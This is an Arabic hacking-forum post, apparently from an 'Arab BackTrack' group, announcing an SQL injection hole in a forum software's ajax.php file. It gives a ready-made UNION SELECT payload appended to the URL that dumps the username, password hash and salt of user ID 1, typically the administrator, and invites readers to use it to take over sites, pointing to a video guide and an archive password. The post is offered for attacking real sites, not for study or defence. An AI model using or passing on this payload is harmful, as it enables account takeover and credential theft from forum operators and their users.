السلام عليكم
قبل فترة نزلت ثغرة جديدة في المنتديات في ملف الاجاكس
الثغرة من نوع sql
الثغرة تعتمد على
ajax.phpاذا كان موجود فالموقع راح تقدر تسحبه هاذه رابط الثغرة تطبيق للثغرة كل ماعليك هو اضافة الاستغلالajax.php?do=inforum&listforumid=100) UNION SELECT1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user |
where userid=1-- -&result=20حلو والى مهو فاهم فيه شئ له في شرح فديو
Pass Unlock: junookyo
.
وفي امان الله هاذا كان معنى اليوم تقبلو تيحاتي --عرب باك تراك-- اهداء الى برق الشمال
